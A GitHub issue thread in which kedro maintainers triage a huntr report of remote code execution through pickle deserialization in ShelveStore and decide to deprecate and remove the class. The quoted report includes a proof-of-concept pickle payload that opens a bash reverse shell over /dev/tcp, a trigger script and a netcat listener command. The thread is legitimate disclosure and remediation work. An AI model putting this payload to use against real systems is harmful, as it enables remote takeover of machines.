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Investigate "Potential security issue" in `ShelveStore` #4137

Closed merelcht closed 6 days ago

merelcht commented 1 week ago


Investigate whether the "potential security issue" flagged in ShelveStore is something we need to address.


The team received the following message:

Hi kedro-org,

A security researcher from huntr has reported a potential vulnerability in kedro.

Here's the report:

Submission date



Remote Code Execution (RCE) via Malicious Shelve File Upload in Kedro's ShelveStore


CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H = High (8.4)

Vulnerability Type

Deserialization of Untrusted Data



A Remote Code Execution (RCE) vulnerability has been identified in the Kedro ShelveStore class. This vulnerability allows an attacker to execute arbitrary Python code via deserialization of malicious payloads, potentially leading to a full system compromise.

Vulnerability Details

Type: Remote Code Execution (RCE)

Class Affected: ShelveStore from kedro.framework.session.shelvestore

Version: 0.19.8


The ShelveStore class uses Python's shelve module to manage session data. The shelve module relies on pickle for serialization, which can be exploited to execute arbitrary code. Crafting a malicious payload and storing it in the shelve file can lead to RCE when the payload is deserialized.


Install the required Python package:

pip install kedro

Steps to Reproduce

Create Malicious Payload:

import os
import shelve
import pickle

# Define the malicious payload class
class MaliciousPayload:
    def __reduce__(self):
        return (os.system, ("bash -c 'bash -i >& /dev/tcp/ 0>&1'",))

path = "/home/cyfra/Bugbounty/huntr/kedro/test/shelve_data.db"

#malicious_data = pickle.dumps(MaliciousPayload())

# Save the malicious payload
print("Saving malicious payload...")
with, writeback=True) as shelve_db:
    shelve_db['malicious'] = MaliciousPayload()

print("Malicious payload saved.")

Trigger the Vulnerability:

from kedro.framework.session.shelvestore import ShelveStore

# Define the path where the shelve file is stored
path = "/home/cyfra/Bugbounty/huntr/kedro/test/shelve_data.db"
# Define a unique session ID
session_id = "1234"  # Random session ID

# Initialize ShelveStore with the path and session ID
ShelveStore(path=path, session_id=session_id)

# Verify the exploit
print("Reverse shell executed successfully...")

Start a Listener:

nc -lvnp 4444

Observe that the server initiates a connection back to your machine, providing a reverse shell.


└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 37648
└─$ whoami

└─$ exit



The Remote Code Execution (RCE) vulnerability in Kedro's ShelveStore allows an attacker to execute arbitrary Python code by exploiting deserialization of a malicious payload. This can lead to severe consequences, including:

Full System Compromise:

Data Breach:

Occurrence(s) in code

Magic link (no sign-up) URL

This report is set to be automatically published on 2024-11-30T06:34:51.536Z UTC. We will remind you as the date gets closer.

You can delay the disclosure timeline, discuss with the researcher, request a fix and plenty more by following the magic link above.

If you have any questions, please get in touch!

ankatiyar commented 1 week ago

It seems like there is a genuine vulnerability with the shelve library for reading unverified files because shelve relies on pickle:

The ShelveStore in Kedro has both save() and read() methods. The read() method is called during a run when the store is initialised -

One of the alternatives to shelve is json. One solution could be to implement a JSONstore and remove ShelveStore. .json is a more transparent file type. As a quick (eta: partial) solution, we could also add some path validation but we would then have to decide on some restrictions to put on the session store path. This path value can usually be set through and SESSION_STORE_ARGS by the user.

However, going through the Kedro docs, I didn't see any mention of the ShelveStore or any instructions on how to use it. If this feature is not used at all, we could consider deprecating and removing it without any alternatives.

Would love the team's thoughts on the way forward. @merelcht @astrojuanlu @lrcouto @ElenaKhaustova @noklam @DimedS

astrojuanlu commented 1 week ago

My reading of the situation is that pickle, hence shelve, is always insecure with untrusted data. And I'm not sure validating the path really helps.

I know removing the class in the next micro version would technically be a backwards-incompatible change, but (1) it's insecure, so people shouldn't be using it anyway, and (2) it's not documented anywhere. So I'm voting for removal.

merelcht commented 1 week ago

I'm also in favour of removing ShelveStore, but I would do it the proper way and deprecate it in the 0.19 series and fully remove in the next breaking release. This is a good lesson for us that while it's easy and non-breaking to add things to the public API, removal always comes at the price of a breaking release. So don't just add things because it's easy.

astrojuanlu commented 1 week ago

My only question is, will that mean that we'll have a public, unaddressed security issue in the codebase from 2024-11-30 (the date the report will be published) until we release 0.20? I know technically it would have no effect provided that the user doesn't use ShelveStore, but I'm wondering if it will raise some eyebrows...

merelcht commented 1 week ago

Technically we have had that issue since it was introduced in 2020.. Since it's a component that isn't widely used, we could do a TSC vote to agree on early removal in a non-breaking change?

DimedS commented 1 week ago

Technically we have had that issue since it was introduced in 2020.. Since it's a component that isn't widely used, we could do a TSC vote to agree on early removal in a non-breaking change?

I agree with the proposal, especially given the security concerns.

astrojuanlu commented 1 week ago

I managed to access the original report on Huntr, updated the description of the issue accordingly (since formatting was lost).

There's an ongoing conversation, as well as actions we can take.


For now, I acknowledged the report and added a cross reference to this thread.